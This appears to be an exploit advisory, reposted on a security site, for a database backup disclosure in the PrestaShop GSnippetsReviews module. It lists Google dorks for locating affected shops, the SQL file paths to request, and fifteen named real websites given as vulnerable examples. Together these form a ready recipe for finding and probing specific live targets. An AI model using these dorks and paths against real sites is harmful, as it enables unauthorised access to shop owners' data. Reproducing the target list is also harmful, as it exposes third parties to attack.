PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

#################################################################### # Exploit Title : PrestaShop Google GSnippetsReviews Modules 1.6.1.4 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/01/2019 # Vendor Homepage : prestashop.com # Software Download Link : addons.prestashop.com/en/seo-natural-search-engine-optimization/ 6144-customer-ratings-and-reviews-pro-google-rich-snippets.html + sourceforge.net/projects/prestashopratingreview/ + codecanyon.net/item/prestashop-products-review-google-rich-snippets-module/20545945 + storeprestamodules.com/prestashop-modules-google-snippets-product-reviews.html # Software Price : 100 Euro # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.11.0± - 1.4.7.0 - 1.4.6.2 - 1.5.4.0 - 1.5.6.1- 1.5.6.2 - 1.5.3.1 - 1.6.0.12± - 1.6.1.1± - 1.6.1.4± # Exploit Risk : Medium # Google Dorks : inurl:''/modules/gsnippetsreviews/sql/'' intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet'' intext:''© 2018 - DECO LED VLC'' intext:''Powered by e-com'' intext:''© 2018 Sud Corner tous droits réservés'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150904/PrestaShop-Google-GSnippetsReviews-1.6.1.4-Database-Disclosure.html #################################################################### # Exploit : /modules/gsnippetsreviews/sql/install.sql /modules/gsnippetsreviews/sql/uninstall.sql /modules/gsnippetsreviews/sql/update-date-rating.sql /modules/gsnippetsreviews/sql/update-lang-review.sql /modules/gsnippetsreviews/sql/update-voucher-fb.sql ################################################################### # Example Vulnerable Sites => [+] vinta-quatre.com/modules/gsnippetsreviews/sql/uninstall.sql [+] himmelslaternen.ch/modules/gsnippetsreviews/sql/install.sql [+] decoledvalencia.com/modules/gsnippetsreviews/sql/install.sql [+] cactose-boutique.fr/modules/gsnippetsreviews/sql/install.sql [+] kakicrazy.fr/modules/gsnippetsreviews/sql/install.sql [+] originalveniceshop.com/modules/gsnippetsreviews/sql/update-date-rating.sql [+] sudcorner.com/modules/gsnippetsreviews/sql/update-lang-review.sql [+] cobureau.net/modules/gsnippetsreviews/sql/update-voucher-fb.sql [+] mondo-bougies.com/modules/gsnippetsreviews/sql/update-date-rating.sql [+] rygeshop.dk/modules/gsnippetsreviews/sql/update-voucher-fb.sql [+] nsbconcept.com/modules/gsnippetsreviews/sql/update-date-rating.sql [+] ventiladorestecho.net/modules/gsnippetsreviews/sql/uninstall.sql [+] mediaperfect.fr/shop/modules/gsnippetsreviews/sql/install.sql [+] tu-instrumento.com.ar/modules/gsnippetsreviews/sql/update-voucher-fb.sql [+] multicouche-et-accessoires.fr/modules/gsnippetsreviews/sql/update-date-rating.sql #################################################################### # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top